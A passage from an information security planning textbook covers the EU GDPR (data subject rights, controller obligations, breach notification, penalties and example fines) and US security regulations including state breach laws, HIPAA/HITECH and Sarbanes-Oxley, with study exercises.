McGraw-Hill Co., New York, NY, pp 257–282. 14. Giles S (2012) Managing fraud risk: a practical guide for directors and managers. Wiley, Chichester, West Sussex, England, pp 255–293. 15. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington MA, pp 461–488. 16. Cichonski P, Millar T, Grance T, Skarfone K (2012) NIST special publication 800-61 Rev 2 computer security incident handling guide. National Institute of Standards and Technology, Gaithersburg MD, August 2012. 17. Philipp A, Cowen D, Davis C (2010) Hacking exposed™ computer forensics, 2nd edn. McGraw-Hill Co, New York, pp 341–368.

Part V

Complying with National Regulations and Ethics

National regulation is extremely important to adhere to since Politico reported GDPR regulatory fines have climbed to €746 million [1] and often the most serious financial impact of a breach is in customer churn [2]. This book’s second edition is broadening its reach as a more international version. While national regulation has been relegated to later chapters of the book, that should not reflect its lack of importance. Chapters are provided on the European Union’s General Data Protection Regulation, American security regulation, and a focus on the U.S. HIPAA/HITECH regulation, which is the focus of the Health First Case Study. Some nations, including India, require adherence to International Security Organization’s standards (ISO/IEC 27001-2) [3]. Furthermore, as the world has become smaller and smaller through international trade, travel and in particular, the Internet’s web, it is also useful if not absolutely necessary, to understand regulations not only in your home country, but also in nations your organization does business with. The final chapter in this section is on ethical risk. As our world has become more driven by technology, changes can now become employed worldwide, nearly overnight, with minimal chance for regulation or corrections to adapt. Therefore, it becomes extremely important for technologists to step up, speak up, and evaluate ethical risk as part of their regular job duties.

References 1. Manancourt V (2022) Instagram fined €405M for violating kids’ privacy. Politico, September 5, 2022 2.  IBM (2021) Cost of a data breach report 2021. IBM 3.  Johnson J, Lincke SJ, Imhof R, Lim C (2014) A comparison of international information security regulation. Interdisciplin J Inf Know Manag, Informing Science Institute, 9:89–116

Chapter 17

Complying with the European Union General Data Protection Regulation (GDPR)

It is critical that controllers assess their level of transparency from the standpoint of complying with data subjects’ needs, rather than from the perspective of how well it serves the controller’s business. Emily Jones, Data Privacy Lawyer and Partner, Osborne Clarke LLP [1], pp. 51–57]

Europe has a common overarching regulation that focuses on data privacy and is exemplary in the rights it affords its constituents. This chapter considers aspects such as the rights afforded data subjects, recommendations for adherence, and impacts of ignoring such regulation. GDPR is applicable not only to all European Union member states, but also to non-EU nations who choose to be GDPR adherent in the European Economic Area (EEA) – and it also applies to all organizations who do business in these nations [2]. The reader is recommended to read the chapter on Information Privacy, which is preliminary reading and discusses some aspects of GDPR.

17.1 Background GDPR replaced Europe’s Data Protection Directive (DPD) of 1995, which was seen to not adequately protect citizens as technology advanced. Secondly, Article 8 of the E.U.  Charter of Fundamental Rights recognizes the right to data protection, and GDPR is meant to address this right as part of the E.U. value of right to privacy. Thirdly, the DPD was inconsistently applied across Europe and a more ‘harmonious’ regulation was needed. Fourthly, the DPD did not provide sufficient incentive for organizations to comply, so fines were enlarged in GDPR. The GDPR became active in May of 2018 to all E.U. states and the EEA countries who chose to join, including Iceland, Norway and Lichtenstein [2]. The U.K. discontinued GDPR in 2020. In its first year, over 144,000 individual complaints were received and over 89,000 data breach notifications were reported [2]. However, GDPR needed a rampup period, as both GDPR administrative organizations became more adept at ­

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_17

311

312

17  Complying with the European Union General Data Protection Regulation (GDPR)

addressing cases, and businesses required warning time to come into compliance. Although the average fine in 2019 was €11,380 [2], in 2022 Politico [3] has reported huge penalties: Amazon €746 million, Instagram €405 million, WhatsApp €225 million, and Facebook €17 million.

17.2 Applicability The GDPR starts by quoting its purpose: “This Regulation protects fundamental rights and freedoms of natural persons and in particular their right to the protection of personal data” (Article 1). However, it clarifies that it applies regardless of the computerization of data, from wholly ‘automated processing’, partial processing, or any variety of noncomputerized access. It applies to all activities within the European Union, whether there is a fee paid or not, and regardless of whether the processing occurs in the E.U. or not. This means that foreign companies doing business or monitoring persons in the E.U. must adhere to GDPR, regardless of where the data is stored or processed.

17.3 General Requirements GDPR penalties can range from warnings to fines of €20 million (approx. $ 20 million) or 4% of annual revenue, whichever is higher, or to closing down processing [2]. This description of GDPR is an overview or introduction and is simplified to improve readability and understandability. While this translation serves to simplify and improve readability for overall understanding, the source of the regulation, at https://gdpr-­info.eu, is the best source for finer details.

17.4 Rights Afforded to Data Subjects There are seven official data subject rights that are important components of GDPR, and three rights related to remedies. They are summarized in this section [4]. There also appear to be some additional privileges, that the GDPR does not call a ‘right’, but appear to be rights none the less. These rights we call ‘privileges’ and they are included at the end of this section. Many rights articles repeat concepts. To avoid repetition and simplify this description, these concerns are briefly summarized here, with their main article source. • Supervisory authorities: These data protection authorities are organization(s) assigned by member nations to process complaints and breaches, investigate cases, advise and promote data privacy, enforce penalties, and work with other

17.4  Rights Afforded to Data Subjects

• •





313

supervisory authorities to apply GDPR in a consistent way across member nations. (Article 54) [2] Child’s consent: Controllers can retain information on data subjects when they are 16 or older. If they are younger than 16, parental consent is required (Article 8). Conflicting laws: The European Union consists of member states. Regulation related to member state regulation or other E.U. regulation may modify GDPR (Article 6). Examples include whether warnings may be issued for the first GDPR violation, and the ages of children who need parental approval [2]. International transparency: Any sending of personal data to international organizations or foreign countries shall be made known to the data subject; these international organizations are equally responsible and accountable for all aspects of GDPR (Article 3, Chap. 5). Public interest: There are cases when data subject rights do not apply, including for reasons of public interest, such as public health, legal proceedings, or needs of “public interest, scientific or historical research purposes or statistical purposes” (Article 17) including archival. The section that limits rights (Article 23) is summarized later in the chapter.

17.4.1 Right of Access by the Data Subject (Article 15) The data subject shall have the right to learn whether their personal data is being processed, and if so, to access information relating to their personal data, including: • the purposes of the processing; • the categories of personal data collected and the source of that information; • Recipient group(s) who will receive the personal data (including international organizations/countries); • the expected period for which the personal data will be retained, or, if not possible, the criteria used to determine that period; • the right to request rectification or erasure of personal data or restriction of processing of personal data concerning the data subject; • the right to lodge a complaint with a supervisory authority; • the existence of and logic for automated decision-making (including profiling) and its significance and impact.

17.4.2 Right to Rectification (Article 16) The data subject shall have the right to obtain from the controller without undue delay the rectification of inaccurate personal data: • the right to have incomplete personal data completed, including by means of a supplementary statement.

314

17  Complying with the European Union General Data Protection Regulation (GDPR)

17.4.3 Right to Erasure (‘Right to Be Forgotten’) (Article 17) The data subject shall have the right to the erasure of personal data without undue delay if either: • the personal data are no longer necessary in relation to original purposes; OR • the data subject withdraws consent or objects to the processing (assuming no overriding legitimate grounds); OR • the personal data have been unlawfully processed or must be erased for compliance with a legal obligation. When the personal data is public, the controller shall take reasonable steps to inform third-party processors that the data subject has requested the erasure. The above shall not apply when inconsistent with: • the right of freedom of expression and information; • reasons of legal obligation, public health or other public interest.

17.4.4 Right to Restriction of Processing (Article 18) The data subject has the right to obtain restriction of processing when: • the data subject contests the accuracy of their personal data or legitimacy of processing, until the accuracy is verified or the issue is resolved; • the processing is unlawful, but the data subject opposes the erasure of their data and instead requests restricting processing; If any of the above bullets apply, personal data shall only be processed • with the data subject’s consent or • for legal claims or public interest or • for the protection of another person’s rights. The controller shall inform the data subject before resuming processing.

17.4.5 Right to Data Portability (Article 20) The data subject shall have the right to • receive his/her personal data, which he/she provided to a controller, in a structured, commonly used and machine-readable format; • transmit their data to another controller, when the processing is automated and based on consent;

17.4  Rights Afforded to Data Subjects

315

• have personal data transmitted directly from one controller to another, where technically feasible. This right shall not adversely affect the rights and freedoms of others.

17.4.6 Right to Object to Processing (Article 21) The data subject shall have the right to object to processing of his/her personal data: • When the processing relates to direct marketing and/or profiling; • Except when the processing is necessary for reasons of public interest; • Except when the controller demonstrates legitimate grounds for continuing processing, such as legal or other issues overriding the interests of the data subject. The controller shall communicate this right clearly and separately from other communications, by the time of the first communication with the data subject.

17.4.7 Right to Not Be Subject to a Decision Based Solely on Automated Processing (Article 22) The data subject shall have the right to not be evaluated based solely on automated processing (including using profiling), when such processing causes a significant or legal impact to them. Exceptions include: when the data subject consents or enters a contract with a controller; or when the nation (or union) approves specific conditions, which include safeguards.

17.4.8 Rights of Remedies, Liabilities and Penalties (Articles 77–79) Three additional rights are allocated to data subjects, as specified in a later section of GDPR, related to GDPR violations against them: • Right to lodge a complaint with a supervisory authority (Article 77). • Right to an effective judicial remedy against a supervisory authority: The data subject can appeal non-action to a court of the nation’s law (Article 78). • Right to an effective judicial remedy against a controller or processor: The data subject can appeal controller or processor wrong-doing, violating GDPR law, to a court of the nation’s law (Article 79).

316

17  Complying with the European Union General Data Protection Regulation (GDPR)

17.4.9 Privilege of Notification (Article 13, 14) When a controller collects information about a data subject, the controller must outline: the controller’s identity and contact information; the purpose, legal justification and/or legitimate interests for processing the information; a description of third parties who may receive the information; whether the information will be retained or processed in a foreign country, and if so, assurances of sufficient controls to safeguard their protection. Data subjects shall also be told upon sign-up (when providing their information): • the impact or options if the subject does not provide the requested information, (e.g., as a contract requirement); • any impact of the processing that will occur, including any profiling, related to signup; • data subject rights (e.g., rights of rectification, erasure, data portability); • data subjects right to withdraw consent and lodge a complaint; • how long their data will be held or the criteria for determining that. When information is obtained without the data subject’s cooperation, the above list is still valid except with the addition of the following notification items: the types of information collected about the subject, and where that information came from. The subject must be notified within 1 month, or by the first communication with the subject, or before the information is provided to another organization. Controllers do not need to notify data subjects when there are valid reasons for professional secrecy or when investigating violations of other national or union laws. If the controller decides to change their purpose for processing, data subjects must be informed in advance.

17.4.10 Privilege of Communicated Response (Article 12) When a data subject requests either copies of their information, changes in processing, or corrections related to any of their rights, the controller shall respond within 1 month. They may respond with a reason for delay and then answer the request within an additional two months. This response shall be given at no charge to the data subject, unless requests are repetitive, in which case the organization may charge a fee or ignore the requests. If the controller suspects a fraudulent identity of the petitioner, they may request additional information (Article 12).

17.4.11 Privilege of Protection of Special Groups (Article 9, 10) It is prohibited to reveal personal data related to: “racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership, and the processing of genetic data, biometric data for the purpose of uniquely identifying a

17.6  Controller Processing Requirements

317

natural person, data concerning health or data concerning a natural person’s sex life or sexual orientation” (Article 9). There are a number of exceptions to this prohibited process, in particular to understand the needs of and protect special groups. Thus, such processing is permitted when consent is given, or for legal, health or other public interest reasons. Similarly, criminal convictions may only be processed under the authority of E.U. or member governments, in order to protect data subject rights (Article 10).

17.5 Restrictions to Rights (Article 23) The above rights are important to protect the fundamental rights of data subjects, but controllers may restrict rights to as a ‘necessary and proportional measure’ to safeguard: • national security, defense, or public security; • the prevention, investigation, or prosecution of criminal offences, execution of criminal penalties, or safeguarding of public security; • for economic, health or other major objectives of general public interest; • the protection of judicial independence and proceedings; • the prevention, investigation, and prosecution of breaches of ethics for regulated professions; • the protection of the data subject or the rights and freedoms of others; • the enforcement of civil law claims.

17.6 Controller Processing Requirements To accommodate GDPR, there are additional processing requirements for the Controller. They are included in this section.

17.6.1 Risk Management and Security Security must be addressed. Security issues include confidentiality, integrity, availability and resilience (Article 32). Controls provided as examples or described in GDPR include data minimization, purpose limitation, encryption and pseudonymization, regular testing for vulnerabilities, business continuity and incident response. A Data Privacy Impact Assessment (DPIA) must be completed whenever processing involving personal information, profiling, legal implications, special groups, or publicly accessible information (Article 35). An example DPIA (modified slightly from GDPR template) is provided in the chapter on Information Privacy. GDPR

318

17  Complying with the European Union General Data Protection Regulation (GDPR)

recommends that controllers survey data subjects about their opinions related to personal risk, and should also check with supervisory authorities, by providing them with DPIA information (Article 36). Controllers are required to have a qualified data protection officer, for government or ‘public authority’ activities, or any activities regularly monitoring a large number of data subjects or persons in special categories (Articles 37–39). The supervisory authority shall have contact information for this data protection officer and data subjects shall also be able to contact him or her.

17.6.2 Breach Notification Breach notification is required within 72 h of becoming aware of a breach (Article 33). The notification must be made to the supervisory authority. This notification shall describe to the best ability of the organization: • • • • •

what is known about the type of data breach; estimated number and types of data subjects and records involved; contact information for the data protection officer or a helpful contact point; the likely consequences of the data breach; the measures planned or taken to mitigate the data breach and its negative effects.

Controllers are also required to notify data subjects, providing similar information to the above list in clear language (Article 33). Controllers are absolved of the breach notification if the information was technically infeasible to be processed by the recipient, e.g., in an encrypted format, or the controller took sufficient action to ensure any threats to data subjects were immediately remediated. Controllers may notify the public instead of each data subject personally, if this can be done more cost-effectively with similar effect.

17.6.3 Penalties Organizations are subject to two levels of penalties: a more severe and lighter level. Higher penalties are applicable when a privacy principle is broken, data subject rights are violated, an international data transfer or specific member nation violation, or upon command by the supervisory authority. The maximum fine imposed is €20 million or 4% of the organization’s total worldwide revenue (Article 83) [2]. Lower level penalties apply to not meeting GDPR required obligations, and can apply to controllers, processors, a certification body or monitoring body. The maximum fine imposed is €10 million or 2% of the organization’s total worldwide income. The range of options a supervisory authority may select includes warning or reprimanding an organization; requiring they send breach notifications; or even

17.6  Controller Processing Requirements

319

closing down data processing [2]. Some nations have a policy of only issuing a warning for a first offense. Finally, there is a question as to whether these penalties are strong enough to withstand organizations whose risk analysis deem higher corporate profits by risking GDPR penalties, rather than complying with GDPR, particularly for technology industries [2].

17.6.4 Certification and Adequacy Decisions It is ‘voluntary’ to be certified for GDPR. Certification is encouraged for controllers and processors, and is meant to be transparent and available to small or large businesses. Certification can be obtained for 3 years, and then renewed. Certification can also be withdrawn by the certification agency or a ‘competent supervisory authority’ (Article 42). Because doing business with the E.U. is lucrative, it is attractive for overseas organizations to have their nation obtain adequacy decisions concerning GDPR. Such decisions can be based on a region or nation, and reflects commitment to GDPR required protections (Article 45). United Kingdom, South Korea and California, U.S.A. (due to its CCPA law) requested adequacy decision statuses [2].

17.6.5 Management and Third-Party Relationships Requirements are provided to describe the relationship between joint controllers, or controllers and processors. Processors are defined to be those that perform processing for controllers, whereas controllers define the purposes and means of processing. An important example is that processors (or third-party recipients of PII) must be informed of rectifications to, or deletions of information, related to the rights to rectification, erasure, and processing. Data subjects shall be told of these communications, if they request. (Article 19) Actual GDPR court cases have assigned the relationship of joint controllers more commonly than controller-processor [1]. An implication of this is that joint controllers must provide a joint privacy practices notice to specify shared data privacy repercussions. Real cases included organizations who used social media to serve their customers. The organizations were providing their own privacy practices, although the social media platform was collecting personal data with cookies. Courts concluded that such a relationship must be of joint controllers, so that the privacy practices must include statements of both organizations. A similar case involved a website operator who used third-party software as a plug-in. The add-on software was not consistent with the organization’s stated privacy practices, and so courts decided a joint controller relationship.

320

17  Complying with the European Union General Data Protection Regulation (GDPR)

A second management issue relates to a strong policy and training environment. A code of conduct is recommended to help in managing GDPR implementation. Article 40 outlines possible topics of inclusion within the code of conduct policy.

17.7 Actual GDPR Cases Three notable early cases include Google, fined €50 million, Marriott International at €18.4 million, and British Airways at €20 million [1]. Major data breaches also fall under GDPR, as was the case for Marriott and British Airways. Courts decided these breaches were a violation of the security article. A number of cases relate to the issue of joint software, whether it be organizations using social media platforms or third-party software. (The reader is referred to the last section entitled Management and Third-Party Relationships.) As an example, Google’s €50 million case was found to violate the following requirements: Transparency and adequate information: Google did not provide all required information in the notice of privacy practices, which requires identity of the controller, purposes and legal basis for the processing, the recipients of the personal data and other information to ensure fair and transparent processing. Secondly, many organizations write NPPs to protect themselves, and not to be clear to their users, such as by the use of hierarchical webpages. A French court determined that it is insufficient to put details within a second layer or linked webpages, while requesting consent on the top page [1]. Valid consent for ad personalization: One general overall acceptance is inadequate in providing users options. When multiple consent boxes are used, users must check boxes to request processing, and not uncheck opt-out boxes [1]. Also, specific consent is required for the implementation of cookies used for personal data collection and targeted advertising. The Greek Data Protection Authority fined an organization €150,000 because they could not prove they requested consent for a processing activity [1]. An implication is that when businesses add or change services, a full evaluation must be performed and the privacy practices notification and consent implementation must be updated.

17.8 Questions and Problems It is recommended to do the Workbook exercises for Information Privacy, since the Workbook exercises are compatible with GDPR. 1. Vocabulary. Match each meaning with the correct word.

17.8  Questions and Problems Controller Erasure

321 Adequacy decision Data subject

Joint controller Supervisory authority

(a) An entity for whom data is collected by the organization. ( b) An organization that collects data on entities. (c) An organization endowed with the responsibility of overseeing GDPR implementation, including processing complaints and issuing judgments. (d) A nation can import E.U. data since it meets GDPR requirements. (e) A relationship where two parties must co-write a privacy protection statement. (f) The right to be forgotten is formally called this right. 2. Legal research. Find a legal case in the news concerning GDPR, that is not covered by this chapter. What was the situation, what violations did the court find, what remediations were recommended (if any), and what was the imposed penalty? 3. Notice of Privacy Practices. Find an E.U. organization’s Notice of Privacy Practices on the web. What principles and rights does it discuss? How does it request your permission  – is it one general permission or one per processing activity? If one per processing activity, what specific permissions does it ask for, and does it provide you options? Are there stated penalties if you do not give your permission? 4. Data Protection Impact Assessment. Complete a DPIA for a case study scenario, as outlined in the Information Privacy chapter’s example. 5. Audit. Your business does business in the European Union, with online sales. Prepare an Audit Engagement Plan to ensure that your organization adheres to three of the E.U. Rights (your choice). Consider not only verifying documented policy, but also implementation. An example Audit Engagement Plan is provided in Table 15.2. 6. Legal Decision. While financially desperate and 18 years old, a woman sold pictures of herself to a pornography film company in your home country, and now, 5 years later, resides in the E.U.  She regrets her decision, because it ­continues to negatively affect her professional career. She has asked the web distribution company (from whom she never got paid) and who does business worldwide, to remove the pages under GDPR. The case is going to trial. (a) What arguments might lawyers from each side present? Present a summary of their arguments. (b) What decision should the judge make? Provide written arguments explaining the essential arguments for his or her decision, based on the law.

322

17  Complying with the European Union General Data Protection Regulation (GDPR)

References 1. Jones E (2020) The GDPR two years on (cover story). Antitrust Magazine 35(1):51–57 2. Hilliard E (2021) The GDPR: a retrospective and prospective look at the first two years. Berkeley Technology Law Review 35(1245):1245–1289 3. Manancourt V (2022) Instagram fined €405M for violating kids’ privacy. Politico, September 5, 2022 4. European Union (2018) General data protection regulation GDPR. https://gdpr-­info.eu

Chapter 18

Complying with U.S. Security Regulations

Together, let us chart a way forward that secures the life of our nation while preserving the liberties that make our nation worth fighting for. –Pres. Barack Obama, Jan. 17, 2014.

What security regulation(s) must your organization adhere to? What must you implement as part of that regulation? How important is it to adhere to security regulations? This section briefly addresses these issues and explains implications of non-compliance. In the United States, news agencies have reported that large companies found to violate security regulation have had to pay millions of dollars to government agencies (often to the Federal Trade Commission or FTC). They are often set up with a special program of remediation and monitoring for an extended period of time (e.g., CVS, ChoicePoint, TJX [3]). These fines and remedial actions are intended to protect individuals from corporations who do not safeguard the security of their customers. Example cases will be described for each regulation. The intention is not to embarrass any particular organization, but rather to illustrate the issues. Many organizations will or have reported intrusions. It is hoped that any organization that has paid massive fines is likely to be currently compliant. To protect customers, patients, and the general public, a number of laws regulate information security in the U.S.  This chapter includes three sections: (1) U.S. security-­oriented laws organizations must adhere to (e.g., HIPAA); (2) criminal laws that protect organizations (e.g., anti-hacking); and (3) an advanced section on the context of U.S. law.

18.1 Security Laws Affecting U.S. Organizations This section lays out basic information about each law, including: (1) example cases showing the need; (2) a definition of who needs to be concerned with the law; and (3) the general requirements of the law. From this description, you may learn which law(s) apply to your organization, and what the laws’ basic precepts include. Table 18.1 maps various regulations, and the PCI DSS standard, to chapters in this

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_18

323

18  Complying with U.S. Security Regulations

324 Table 18.1  Chapters Required for Regulation Chapter notation: R = Required A = Advisable 1. Security awareness 2. Fraud 4. Risk 5. Business continuity 6. Governance (Policy) 7. Information security 8. Network security 9. Physical security 10. Data privacy 12. Personnel security 13. Incident response 14. Metrics 15. Audit

State breach A A A

R R R A R

HIPAA R A R R R R R R R R R R

SOX R R R R R R R R R R R R R

GLB R R R R R R R R R R R A R

Red flag R R A R R A A R R R A

FISMA R R R R R R R R R R R R R

PCI FERPA DSS A R A A R R R R R R R R A R R A R A R R

book. This table will hopefully help you in adhering to applicable laws. Further information on each law is available in the references and on the web, since this general text does not discuss all specific requirements.

18.1.1 State Breach Notification Laws All 50 states, the District of Columbia, Guam, Puerto Rico and the Virgin Islands have enacted legislation requiring notification of security breaches involving personal information – however, these laws vary by state [5]. The law was first enacted in California in 2003. It was first enforced in 2005 with ChoicePoint, a data broker who sold credit reports and information about consumers. Law enforcement reported that an identity theft ring potentially took personal information for over 160,000 people [3]. The identity theft ring had pretended to be lawful ChoicePoint customers. ChoicePoint paid $10 million in civil fines to the FTC, $5 million to fund a consumer relief program, $500,000 to states impacted by the breach, as well as the cost of sending notification letters to over 160,000 people. The ChoicePoint-FTC settlement included ChoicePoint agreeing to create an information security program and incur yearly independent audits until the year 2026. A second case in 2009 resulted in ChoicePoint reevaluating its security plan and reporting to the FTC on its security efforts every two months until 2011. Applicability: This law applies to any organization “… that, for any purpose, handles, collects, disseminates, or otherwise deals with nonpublic personal information.” (from the Illinois state breach law [5]) Protected information includes for most states: Social Security number, driver's license number, state identification card number, financial account number or credit or debit card number, “or an

18.1  Security Laws Affecting U.S. Organizations

325

account number or credit card number in combination with any required security code, access code, or password that would permit access to an individual's financial account.” For some states, including California, Texas, Virginia, Arkansas, and Missouri, private information also includes medical or health insurance information. California law also protects user names and ­passwords [6]. Private data excludes lawful information available to the public by local, state, or national government. General requirements. While each state breach law may be different, this section provides guidelines describing the general intent of the various breach laws. When a breach of private information is determined, the organization must notify the affected persons in plain English in an expedient and timely manner, at no cost to the person. The disclosure may be delayed by law enforcement for an investigation. The disclosure notification shall inform the victims of the breach, including the (estimated) date and nature of the breach and any steps the data collector has taken or plans to take relating to the breach. The disclosure notification may, in addition, require consumer reporting information, such as the toll-­ free numbers, address, and website for consumer reporting agencies. It may require a statement indicating that these sources can provide help about fraud or security alerts, or other recommended actions. The data collector may need to cooperate with each victim in matters relating to the breach, short of disclosing confidential information or trade secrets. This notification may be provided in written or electronic form. Special conditions may apply, based on state laws. An affected victim can include an individual or any type of organization. Government agencies are also subject to this law, and often must also report breaches to a higher state agency. State agencies may be required to securely dispose of information, when it is no longer needed. In California, New  York, and other states, stolen personal information that is encrypted is exempt from disclosure – as long as the encryption key was also not acquired. Texas requires proper information disposal, but it permits encryption: “otherwise modifying the sensitive personal information in the records to make the information unreadable or indecipherable through any means.” Personal information shall be disposed of in a way that renders the personal information unreadable, unusable, and undecipherable. Proper disposal methods for paper documents include redaction, burning, pulverizing, or shredding. Disposal methods for electronic and other media include destroying or erasing the media to “prevent the personal information from being further read or reconstructed”. Penalties may apply if an organization fails to report a breach. Fines may range between $10 and $2000 per affected person, with a maximum total penalty of $50,000–150,000 per breach situation. New York also requires notification to a state agency. Some states may have additional privacy laws. For example, California includes a health privacy law and consumer report law, as well as separate privacy laws applied to business and government. Texas permits expulsion for students who abuse school computers. To find the privacy laws applicable to a particular state, see the National Conference of State Legislatures (www.ncsl.org/issues-­research/telecom/security-­breach-­notification-­laws.aspx) [5].

326

18  Complying with U.S. Security Regulations

18.1.2 HIPAA/HITECH Act, 1996, 2009 The Health Insurance Portability & Accountability Act (HIPAA) was passed in 1996. HIPAA initiated a standard for the exchange of electronic health information and regulated the protection of personal health information, within Title II of this comprehensive regulation. This privacy protection is defined in the Privacy Rule, which protects health information whether or not it is computerized; and the Security Rule, which specifically applies to computerized health information. Since the original law lacked sufficient force, the HITECH Act passed in 2009 to strengthen penalties, protect patients who had been harmed, require breach notification, and ensure compliance by both Covered Entities (CE: i.e., health care providers and insurance) and their Business Associates (BA, or contractors) [7]. Background: The release of personal health, addiction, or mental health information can result in social isolation, employment discrimination, and a denial of lifesaving insurance coverage. Example abuses include cases of employment discrimination in hiring, promotion and retention; abuses of privacy resulting in public embarrassment; massive breaches; and avoidance of the use of health insurance when job discrimination could result. See the next chapter on HIPAA for more details [8]. In 2006, CVS pharmacies were caught throwing away unredacted pill bottles, medical instruction sheets, and pharmacy receipts. These contained patient names, addresses, prescriptions names, physician names, health insurance numbers, and credit card numbers. The FTC and Health and Human Services (HHS) each developed separate remediation plans with CVS that included the development of a security plan, security policies, and an employee training program. The remediation plans also required independent audits and HHS monitoring. CVS paid $2.25 million in fines [3]. In 2009, Blue Cross Blue Shield in Tennessee had 57 hard disks stolen, releasing medical information and social security numbers for over one million people. They paid $1.5 million to Office of Civil Rights, incurred a 3-year remediation plan, and spent $17 million in investigation, notification, and protection expenses [9]. Applicability: Covered Entities (CE) include health care providers, health plan organizations, and health care clearinghouses. Even organizations which maintain nurses’ offices need to be concerned. Business Associates (BA) include organizations who consult for health care organizations [7]. Thus, HIPAA/ HITECH applies widely. General requirements: The Privacy Rule. The Privacy Rule ensures that health care providers maintain policies regarding patient privacy, including that health information are not to be used for non-health purposes, such as marketing [7, 8]. Workers shall have minimum access to patient information, sufficient only to do their jobs. Privacy safeguards should be reasonable, including privacy curtains, locked cabinets, paper shredders, and clean desk policies. However, privacy requirements are not to be extreme, such as private, soundproofed rooms. CEs

18.1  Security Laws Affecting U.S. Organizations

327

and BAs must track both allowed and unintended disclosures of patient information. Patients have a right to obtain their own patient information, request corrections, and to know who has accessed their health information. Patients should know how their provider handles privacy, via a Notice of Privacy Practices. The Security Rule. The Security Rule recognizes that Confidentiality, Integrity, and Availability are all important in protecting Electronic Protected Health Information (EPHI) [7, 8]. This regulation is based on risk management, to ensure that security costs correspond with risk. The goal of the regulation is that it is scalable, technology independent, and comprehensive. The regulation outlines technical, administrative, and physical security requirements, while avoiding specifying detailed technologies that are likely to change with time. Each requirement is defined as Required or Addressable, with Addressable options allowing for documented, alternative, effective implementations. Briefly, administrative requirements include risk management, alarm/log monitoring, periodic policy review/audit, and personnel management. Personnel requirements include EPHI access granting procedures, supervision of EPHI access, termination procedures, and sanction policies for HIPAA violations. Physical security requirements include a physical security plan, business continuity plans, documented maintenance records, workstation acceptable use plans, and controls for devices and media (describing proper use, repair, disposal, and backup). Technical controls include individual authentication controls, automatic logoff/lockout, encryption and integrity (message digest) controls, and event/transaction logging. Further information is provided in Chap. 19 of this text.

18.1.3 Sarbanes-Oxley Act (SOX), 2002 During the 1990s and early 2000s, there were a number of corporations who suffered serious and highly publicized accounting fraud [10]. In 2001, Enron was reported to issue statements misleading regulators and the public, and using aggressive accounting techniques in reporting profits. In 2001 and 2002, WorldCom charged expenses as capital expenses, and reported millions in profit, when they should have reported losses. These and other publicized cases resulted in corporate bankruptcies, loss of employee retirements savings in the billions, executive jail time for 15–25 years, and sometimes, restitution fines [3]. Arthur Andersen LLP, an accounting and audit firm, did not follow General Accepted Accounting Practices, thereby assisting in the misleading financial reports of WorldCom, Enron, Sunbeam, and Waste Management System. This led to the felony conviction of Arthur Andersen in 2002, for obstructing justice [10]. As a result of this fraud, the Sarbanes-Oxley act was passed in 2002 to protect stockholders, employees, investors, and other stakeholders. Its general purpose is to

328

18  Complying with U.S. Security Regulations

address securities fraud, define ethics for reporting finances, increase transparency of financial reporting to stockholders and consumers, ensure disclosure of stock sales to executives, and prohibit loans to top managers. Applicability: This law applies to publicly traded companies who sell stocks on an American stock exchange and must register with the Security and Exchange Commission (SEC). Therefore, it applies to many international companies, in addition to American companies [3]. Two provisions also apply to not-for-profits. Not-for-profit organizations may consider adherence to additional aspects or the full regulation, in order to gain credibility with donors. Not-for-profits have had their share of major fraud losses, which caused bad publicity. Some states, including New  York, California, and New Hampshire, have additional regulation impacting hospitals or nonprofits [11]. General requirements: Requirements for Public, Private, and Nonprofit organizations. Two provisions limit organizational interference in ensuring that fraud can be fully disclosed. These provisions, which apply to all organizations, include the Whistleblower provision and a prohibition against destroying certain documents. The Whistleblower provision requires organizations to establish a means to report financial improprieties and complaints, and prevents the organization from punishing employees who report suspected illegal actions to a judicial proceeding. Any person who destroys, tampers with, or conceals documents that could be evidence in a federal investigation or bankruptcy case is liable for up to a 20-year prison term and/or fines [11]. These policies should be written and well-known, and also apply to electronic records, voicemail, and archives [12]. These provisions are part of SOX Section 806 and 301. Other recommended provisions for nonprofit organizations include the full section 301, 302, and 404, which are described below. Requirements for Publicly-Traded Companies. Briefly, the full set of sections of Sarbanes-Oxley includes [10]: • Section 301: Public companies shall establish an audit committee, which hires a registered accounting firm and establishes policies and procedures for handling complaints concerning finances. • Section 302: Corporate responsibility for financial reports includes a periodic mandated reporting process, where the signing officer testifies to the accuracy and completeness of the audit report, and is responsible for internal controls. The report in addition lists the auditors, audit committee, and significant deficiencies affecting business finances. • Section 401: Enhanced disclosure in periodic reports includes clarity and better defined transactions for financial reporting. • Section 404: Management assessments of internal controls [13]: Auditors must do an audit beyond the traditional financial audit: they must also audit

18.1  Security Laws Affecting U.S. Organizations

329

internal control. Management must provide internal control documentation and perform an assessment of the effectiveness of the organization’s internal controls. These controls shall define how significant transactions are processed, how assets are safeguarded, how fraud is controlled, and how end-of-­ period financial reporting occurs. Sections 302 and 404 are concerned with reporting the effectiveness of the organization’s internal control, and Section 404 impacts information technology and security. COSO, Committee of Sponsoring Organization of the Treadway Commission, was created to develop standards for Sarbanes-Oxley (SOX) security implementation. COSO defines two areas of control: Process Activity Level and Entity Level controls. Process Activity controls require the documentation of processes and transactions for specific business functional areas, and can be documented as a walkthrough for significant transactions. Entity Level controls include cross-cutting services for many business functional areas, such as IT, personnel, and risk management. COSO then specifies five components: risk assessment, control environment, control activities, information and communication, and monitoring, which then are applied to each of the two areas of Process Activity and Entity Level controls. COBIT is an application of COSO for IT, and is published by the ISACA [14]. COBIT documents Section 404 requirements for information security. To establish Entity Level controls for quality and integrity of financial information (thereby minimizing fraud), the computing environment is best controlled with an implementation of IT best practices. COBIT applies the five COSO components to the IT lifecycle: (1) Evaluate, Direct and Monitor; (2) Align, Plan and Organize; (3) Build, Acquire and Implement; (4) Deliver, Service and Support; and (5) Monitor, Evaluate and Assess. This derives 40 detailed requirements. Key Area Evaluate, Direct and Monitor addresses governance objectives in defining IT’s relationship with executive management. Key Area Align, Plan and Organize emphasizes strategic planning, IT-business alignment, and IT-interdepartmental communication. Key Area Build, Acquire and Implement addresses defining requirements, testing configurations, and tracking changes. Key Area Deliver, Service and Support includes managing operations, incidents, problems, continuity, and security. The final Key Area, Monitor, Evaluate and Assess, addresses monitoring of performance, conformance, and internal controls. This comprehensive 